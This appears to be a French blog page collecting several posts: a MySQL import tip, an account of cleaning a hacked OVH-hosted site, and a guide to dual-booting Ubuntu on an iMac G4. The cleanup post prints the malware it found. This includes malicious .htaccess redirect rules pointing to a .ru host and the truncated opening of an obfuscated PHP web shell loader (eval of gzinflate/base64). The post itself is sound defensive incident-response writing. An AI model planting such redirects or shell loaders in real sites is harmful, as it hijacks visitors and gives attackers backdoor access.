Une commande toute bête mais qui permet de lancer rapidement l’importation d’un dump de base, comme un backup:
root: identifiant de connexion a la base
localhost: l’adresse du serveur mysql
mabase: le nom de la base de donnée
Une commande toute bête mais qui permet de lancer rapidement l’importation d’un dump de base, comme un backup:
root: identifiant de connexion a la base
localhost: l’adresse du serveur mysql
mabase: le nom de la base de donnée
Jusqu’à ce jour je n’es eu a faire face qu’a trois attaque dirigé contre des site sous ma responsabilité. Les deux premières furent sur mangas-tv du temps ou je m’en occupait encore. Ces deux premières attaquent étais dirigé par des hackers et j’ai pu résoudre ces deux problèmes de la même manières: Je suis rentré en contact avec le hacker (annonce sur le site web en question).
J’ai actuellement comme travail la refonte d’un petit site internet (type association foyer rural) afin de remplacer un vieux site statique. J’ai récemment pu découvrir que le vieux site avait permis a des robots de rentrer sur l’hébergement tel un gruyère.
Voilà en gros ce que j’ai pu trouver sur la machine:
Des .htaccess contenant ce genre de choses
ErrorDocument 400 http://**********.ru/upday/index.php ErrorDocument 401 http://**********.ru/upday/index.php [...] RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite| altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search| metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex| rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch |yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search |walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick |terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey |galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro |suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase |schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L] [...]
Et des fichiers php avec ce genre de contenu:
<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true; $default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A \x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64 \x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj AQzKhlHgTkLPCodOWCzQSCFI4 [...]
En gros on constate que des scripts php servant de porte dérobés placent des .htaccess un peu partout pour modifier le comportement du navigateurs des visiteurs. Du moins c’est ma conclusion.
Une des premières choses a faire et d’aller consulter les fichiers journaux (logs) de votre machine. Pour un hébergement mutualisé chez ovh nous avons accès a ces différents logs ici: https://logs.ovh.net/ (identifiez vous avec votre accès OVH).
Premièrement de quel manière l’attaquant entre en contact avec votre machine: FTP ? Je regarde les logs d’accès: il n’y a aucun autre accès que le mien dans les logs. On change tout de même de mot de passe.
Deuxièmement: Les accès http. On fouille dans les requêtes http voir ce que l’on trouve. Dans mon cas ces lignes sont intéressantes:
77.84.28.135 domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php HTTP/1.1" 200 34 "-" "-" 79.137.237.79 domain.tdl - [23/Feb/2012:00:01:28 +0100] "POST /photos/zp-core/ zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.imagess.php HTTP/1.1" 200 123 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
On peut trouver de cette manière quel sont les fichiers trojans sur le serveur. Mais ce n’est pas non plus très pratique: Des milliers voir des millions de lignes a lire (ou a exploiter avec des scripts bien sur) et la liste que vous arriverez a faire ne sera pas exhaustive.
Les hébergements « perso » chez ovh ne nous permettent pas de se connecter en ssh a la machine d’hébergement. Ce qui au final est un gros handicap de ne pas pouvoir utiliser la puissance de la ligne de commande. C’est la que ca devient intéressant: Ovh propose un accès WebDav. bingo on peut se monter un répertoire pointant sur le webdav ! (activez votre accès webdav sur l’interface ovh au préalable)
mkdir /mnt/tmp mount.davfs https://[login].webdav.ovh.net /mnt/tmp
On peut maintenant utiliser la puissance de la ligne de commande sur les fichiers de l’hébergement mutualisé. Ma stratégie a été de rechercher dans tous les fichiers du contenu similaire a celui trouvé dans les fichiers suspects:
grep --color=auto -rn "auth_pass" /mnt/tmp | tee -a /home/bux/tmp/logvirus_a_1 && grep --color=auto -rn "RewriteCond" /mnt/tmp | tee -a /home/bux/tmp/logvirus_a_2
| tee -a permet de mettre dans un ffichier le résultat de la commande.
J’ai pu par la suite éplucher le résultat de mes deux commandes et lister les fichiers a supprimer. Pour le moment tout semble tranquille mais je reste au aguets, rien ne dit que je n’est pas raté certains fichiers …
Edit: Depuis le site à de nouveau été vérolé. J’ai donc du tout supprimer du FTP et réinstaller les composant un à un a partir de source propres (wordpress, gestionnaire de photos, etc)
Un iMac G4 a récemment est récemment passé a ma porté. Je l’es tant bien que mal accepté même si son système est propriétaire. Et même si il y a du Unix la dedans j’ai tout de même voulu installer un linux en dual boot.
Premièrement mon choix c’est porté vers ubuntu. Il m’a fallut télécharger la version PPC vu que cette machine est équipé d’un Processeur de type PowerPc (imac < 2005).
Une fois dans la procédure d’installation d’ubuntu il m’a fallut redimensionner la partition principale du disque. Cependant j’ai découvert que le redimensionnement ne peut s’opérer sur les partition de type HFS lors de l’installation d’ubuntu. Il m’a donc fallu trouver un moyen différent de la redimensionner.
J’ai donc télécharger un live cd prévu pour l’architecture PPC: Finnix .
Une fois l’iso gravé et chargé au démarrage du mac (Super+S avec un clavier non mac, sinon c’est Option+S je crois) je démarre la procédure.
J’identifie le nom du disque:
Dans mon cas ce sera /dev/sda
L’interface de parted se lance
J’identifie le numéro de la partition qui m’intéresse:
Pour moi c’est la 5
Je valide sans rien changer
Je saisie 40.00GB
La procédure se lance. Dans mon cas une bonne demi-heure. Une fois la procédure terminé j’effectue un petit redémarrage pour contrôler que tout fonctionne correctement sous mac OS X. Tout est ok, reboot et démarrage sur le livecd d’ubuntu PPC puis installation !
Attention: Les pilotes graphiques ne sont pas toujours très fonctionnels. Dans mon cas ubuntu ne démarré même pas son interface graphique. J’ai réussis a avoir des pilotes fonctionnels avec cette distrib’ mais ne fonctionnant qu’en mode dégradé.